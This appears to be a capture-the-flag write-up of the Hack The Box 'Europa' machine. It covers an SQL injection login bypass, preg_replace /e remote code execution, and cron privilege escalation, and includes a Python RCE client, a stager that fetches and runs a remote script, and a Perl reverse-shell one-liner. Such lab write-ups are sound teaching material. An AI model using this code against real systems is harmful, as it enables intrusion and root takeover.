The Europa machine on Hack The Box has retired. It was a Linux VM that can be considered a beginner-level box. Finding the user flag was "Not too Easy", but the privilege escalation part was pretty much "Easy".

Note: In order to keep all my CTF write-ups crisp and concise, I only mention the steps that led to positive results. There was a lot of trial and error, and hours or in some cases even days of failed attempts, before reaching the correct solution. For this challenge, the IP address of my machine was 10.10.14.50 and Europa was 10.10.10.22.

Reconnaissance

I started with nmap to check all TCP ports (-p-), identify the versions of the services running (-sV) and run the default script set (-sC):

nmap -sC -sV -p- 10.10.10.22

22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|_  256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 22, 80 and 443 were open. The SSL certificate on port 443 carried host names (europacorp.htb, www.europacorp.htb and admin-portal.europacorp.htb in the subject and Subject Alternative Name), so I added the following entry to the /etc/hosts file of my system. This allowed me to reach the web application by its domain name.

10.10.10.22 admin-portal.europacorp.htb

Exploitation

On navigating to the above URL, I found a login page. The login page was vulnerable to SQL injection: for the username I used admin@europacorp.htb and modified the request in Burp.
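The write-up does not show the injected value or the portal's code, so the following is an added Python example rather than anything from the original post: it models a login query assembled from raw form fields against a constructed in-memory SQLite table, shows why a crafted password (or a quote-and-comment in the username) authenticates as admin@europacorp.htb, and places the parameterized query beside it. The table, the stored password and both payloads are assumptions made for the demonstration.

```python
import sqlite3

# Constructed stand-in for the portal's user table (assumption, not the real schema).
USERS = [("admin@europacorp.htb", "NotTheRealPassword")]

# Two classic bypass payloads (assumed for illustration; the post does not give the one used).
PASSWORD_PAYLOAD = "' OR '1'='1"               # turns the WHERE clause into ... OR '1'='1'
USERNAME_PAYLOAD = "admin@europacorp.htb'-- "  # closes the string and comments out the password check


def make_db():
    """In-memory SQLite database seeded with the constructed user row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, username, password):
    """Query built by string formatting: the bug class behind a login bypass.

    Returns the matched username, or None when no row matches.
    """
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Same lookup with bound parameters: form input can no longer change the SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload in password:", login_vulnerable(db, "admin@europacorp.htb", PASSWORD_PAYLOAD))
    print("vulnerable, payload in username:", login_vulnerable(db, USERNAME_PAYLOAD, "wrong"))
    print("fixed, payload in password:     ", login_fixed(db, "admin@europacorp.htb", PASSWORD_PAYLOAD))
```

With the password payload the vulnerable query becomes `... AND password = '' OR '1'='1'`, and because AND binds tighter than OR the row is returned regardless of the password; with the username payload the `--` comments out the password check entirely. The fixed version sends the same strings as bound values and matches nothing.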

The injected login worked and I was redirected to the dashboard. Then I navigated to the tools.php page, which expects the user to input an IP address. I entered a random IP and intercepted the request in Burp.

The POST request had three parameters: pattern, ipaddress and text. From the server's response I worked out that tools.php takes the regular expression supplied in pattern (here /ip_address/), replaces every match of it in text with the value of ipaddress, and returns the result. That is preg_replace(), and the dangerous part is the pattern modifier: 'i' only makes the match case-insensitive, but 'e' makes PHP evaluate the replacement string as PHP code once the pattern matches, so it can be abused to execute arbitrary code. The 'e' modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0.0, so any PHP 5.x interpreter that lets the user control the pattern turns preg_replace() into remote code execution. For example:

$word = "you are safe";
echo preg_replace("/safe/i", "not safe", $word);                        # 'i' only matches case-insensitively: prints "you are not safe"
echo preg_replace("/safe/e", "system('echo you are hacked')", $word);   # 'e' evaluates the replacement as PHP: system() runs and prints "you are hacked"







Remote Code Execution

Code execution can be achieved by sending the POST request in the following form. COMMAND must be PHP code (for example system('id')), because the 'e' modifier makes preg_replace() evaluate the replacement for each match of ip_address in text:

pattern=/ip_address/e&ipaddress=COMMAND&text=ip_address



I created a listener with nc -nlvp 4444 on my local system to catch a reverse shell. For some unknown reason, the reverse shell using nc kept dropping immediately after the connection was established. I therefore decided to move away from nc and upload a reverse shell script in Python or Perl, and modified the Burp request to test whether Perl was installed on the victim.

Before the connection closed, I received confirmation that Perl was installed 😀

Getting Reverse Shell

I downloaded the Perl reverse shell script from pentestmonkey to my local system and changed the IP and port. I served it with a temporary web server (python -m SimpleHTTPServer, port 8000 by default) and opened a listener on port 5555 for the reverse shell. Then I modified the POST request in Burp to fetch the script into the /tmp directory of the target machine and execute it.

And I successfully got the shell!
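Putting the steps above together (the /e pattern, PHP code as the replacement, and fetching the Perl shell into /tmp), here is an added Python client that is not part of the original write-up. It assumes the page lives at https://admin-portal.europacorp.htb/tools.php, that the admin session is carried in a PHPSESSID cookie, and that wget exists on the target; none of that is stated in the post. The helpers that build the request body run offline; run_command() is the only function that touches the network.

```python
import ssl
import urllib.parse
import urllib.request

# Assumed location of the vulnerable page: the host comes from the certificate SAN,
# the file name from the post, the scheme from the open port 443.
TOOLS_URL = "https://admin-portal.europacorp.htb/tools.php"


def php_string(s):
    """Quote s as a PHP single-quoted string literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_system(cmd):
    """PHP expression that runs cmd through the shell and writes its output into the page."""
    return "system(%s)" % php_string(cmd)


def build_rce_body(php_code):
    """Form body for tools.php: pattern with /e, PHP code as replacement, a subject that matches once.

    The server effectively runs preg_replace('/ip_address/e', php_code, 'ip_address'),
    which evaluates php_code on the single match.
    """
    fields = {
        "pattern": "/ip_address/e",
        "ipaddress": php_code,
        "text": "ip_address",
    }
    return urllib.parse.urlencode(fields).encode()


def stage_shell_command(attacker_ip, http_port, script="shell.pl", dest="/tmp/shell.pl"):
    """Shell pipeline that fetches the reverse-shell script and runs it with perl.

    The post does not say which downloader it used; wget on the target is an assumption.
    """
    url = "http://%s:%d/%s" % (attacker_ip, http_port, script)
    return "wget -q %s -O %s && perl %s" % (url, dest, dest)


def run_command(cmd, session_id, url=TOOLS_URL, timeout=15):
    """Send one shell command through the preg_replace() /e sink and return the HTML response.

    Needs a valid admin session (cookie name PHPSESSID is assumed). Network call; not used offline.
    """
    req = urllib.request.Request(url, data=build_rce_body(php_system(cmd)), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", "PHPSESSID=%s" % session_id)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # the lab box presents a self-signed certificate
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Show the two bodies you would paste into Burp: a probe and the shell stager.
    print(build_rce_body(php_system("id")).decode())
    print(build_rce_body(php_system(stage_shell_command("10.10.14.50", 8000))).decode())
```

Because the 'e' modifier evaluates the replacement once per match, keeping text to a single occurrence of ip_address runs the command exactly once, and the command output appears in the response where the replaced text would have been. A request that launches the reverse shell does not return while the shell is alive, which is expected.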

Navigating to /home/john/ gave the user flag (user.txt).

Privilege Escalation

A cron job running with root permission lived in the folder /var/www/cronjobs/.

That job executed the shell script logcleared.sh from /var/www/cmd with root permission, so I created the following bash script named logcleared.sh at /var/www/cmd and made it executable with chmod +x logcleared.sh:

#!/bin/bash
perl -e 'use Socket;$i="10.10.14.50";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

I started a listener on port 6666 on my local system. The next time the cron job ran, it executed the script and handed back a reverse shell with root permission, from which the root flag can be read at /root/root.txt.
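The privilege escalation above is a general pattern: a root cron job runs a script that a low-privileged user can write or create. The following Python check is an added example, not part of the original write-up and not the author's tooling: it parses /etc/crontab-style lines, collects the absolute paths each root job runs (including, one level down, paths named inside a readable script, which is how a job in one directory can call a script in another), and reports those the current user can modify or create. demo() builds a constructed throwaway layout modelled on the cronjobs/cmd directories described above; the file names in it are assumptions.

```python
import os
import re
import shlex
import tempfile

# Device and pseudo-filesystem paths are writable by design and never interesting here.
IGNORED_PREFIXES = ("/dev/", "/proc/", "/sys/")
PATH_RE = re.compile(r"/[\w./-]+")


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text (time fields, user, command)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                    # @reboot / @daily user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        fields = line.split(None, 6)                # m h dom mon dow user command
        if len(fields) < 7 or "=" in fields[0]:     # too short, or an env line such as PATH=...
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def referenced_paths(command):
    """Absolute paths on a command line: interpreter, script and arguments."""
    try:
        tokens = shlex.split(command)
    except ValueError:                              # unbalanced quotes: fall back to whitespace
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and not t.startswith(IGNORED_PREFIXES)]


def paths_called_by_script(path, limit=1 << 20):
    """Absolute paths mentioned inside a readable script (one level of indirection)."""
    try:
        if os.path.getsize(path) > limit:
            return []
        with open(path, "r", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return []
    return [p for p in PATH_RE.findall(content) if not p.startswith(IGNORED_PREFIXES)]


def check_path(path):
    """Reason the current user could change what root will execute, or None."""
    if os.path.exists(path):
        if os.access(path, os.W_OK):
            return "writable"
    else:
        parent = os.path.dirname(path)
        if os.path.isdir(parent) and os.access(parent, os.W_OK):
            return "missing, parent dir writable"
    return None


def writable_root_jobs(crontab_text):
    """(job command, path, reason) for every root job whose code the current user can influence."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        seen = set()
        for path in referenced_paths(command):
            for cand in [path] + paths_called_by_script(path):
                if cand in seen:
                    continue
                seen.add(cand)
                reason = check_path(cand)
                if reason:
                    findings.append((command, cand, reason))
    return findings


def demo():
    """Constructed layout (assumption): a root job in cronjobs/ calls a script in cmd/ that does not exist yet."""
    base = tempfile.mkdtemp(prefix="cron-demo-")
    cmd_dir = os.path.join(base, "cmd")
    job_dir = os.path.join(base, "cronjobs")
    os.makedirs(cmd_dir)
    os.makedirs(job_dir)
    missing_script = os.path.join(cmd_dir, "logcleared.sh")   # we can create it: cmd_dir is ours
    job_script = os.path.join(job_dir, "cleanup")             # exists and names the missing script
    with open(job_script, "w") as fh:
        fh.write("#!/bin/bash\n%s\n" % missing_script)
    os.chmod(job_script, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        "* * * * * root %s\n"
        "@daily www-data %s\n" % (job_script, missing_script)
    )
    return {"findings": writable_root_jobs(crontab), "missing_script": missing_script, "job_script": job_script}


if __name__ == "__main__":
    for job, path, why in demo()["findings"]:
        print("%-40s %s (%s)" % (job, path, why))
```

On a real target, feed it the contents of /etc/crontab and the files under /etc/cron.d; the www-data job in the demo is skipped because only root jobs matter for escalation, and the missing logcleared.sh is reported because its parent directory is writable, which is exactly the condition the script above exploited.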

I hope this write-up was helpful. Share it if you found it useful. If you have any questions or suggestions, please leave your comments. Subscribe to the mailing list to get updates on my future CTF write-ups and blogs.

Happy Learning 🙂